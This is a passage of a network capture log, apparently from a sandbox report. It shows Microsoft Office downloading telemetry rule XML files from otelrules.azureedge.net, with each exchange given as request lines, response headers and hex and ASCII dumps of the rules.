T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.7	49802	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:39 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:39 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:39 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 229e582e-901e-0083-26d2-2cbb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165639Z-16547b76f7f8dwtrhC1DFWd1zn0000000120000000007r9u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:39 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.7	49803	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:39 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:39 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:39 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: c3d6966f-401e-0016-3ad8-2b53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165639Z-15869dbbcc6b69h9hC1DFWf01w00000000w00000000050zu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:39 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.7	49804	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:40 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:40 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:40 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 12f82536-d01e-0066-4725-2cea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165640Z-r159446fcd7nszvrhC1DFW2d0g00000001n00000000086z3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:40 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.7	49806	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:40 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:40 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:40 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 6028abc9-b01e-0002-6508-2c1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165640Z-16547b76f7fkcrm9hC1DFWxdag000000011g000000007wcq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:40 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.7	49805	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:40 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:40 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:40 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 55fee263-701e-0032-0267-2ca540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165640Z-r159446fcd7xfscrhC1DFWamb000000001p000000000au1q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:40 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.7	49807	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:40 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:40 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:40 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 682504c0-001e-005a-75d2-2cc3d0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165640Z-16547b76f7f67wxlhC1DFWah9w00000000ug00000000gdbq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:40 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.7	49808	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:40 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:41 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:40 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: e5af20bf-e01e-00aa-1a28-2cceda000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165640Z-176bd8f9bc5fngbjhC1DFWmqsc00000001yg00000000dn09 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:41 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.7	49816	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:41 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:41 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:41 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 4e98fbea-b01e-0002-08d2-2c1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165641Z-16547b76f7flnnx5hC1DFWrfh400000000z000000000abgs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:41 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.7	49817	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:41 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:41 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:41 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 081c3a8e-a01e-0053-58d2-2c8603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165641Z-16547b76f7fsjlq8hC1DFWehq000000000pg00000000c1qf x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:41 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.7	49815	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:41 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:41 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:41 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: 87c6e767-f01e-003c-4308-2c8cf0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165641Z-15869dbbcc6vr5dxhC1DFWyqks00000000y000000000656c x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:41 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.7	49820	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:42 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:42 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:42 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: d5f81faf-001e-0017-2ed2-2c0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165642Z-15869dbbcc6tfpj2hC1DFWvt5g00000000x000000000450e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:42 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.7	49819	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-02 16:56:42 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-02 16:56:42 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:42 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 1afb2a81-701e-0032-032f-2ca540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241102T165642Z-176bd8f9bc5wl4brhC1DFWmstw000000027g00000000bhem x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-02 16:56:42 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" 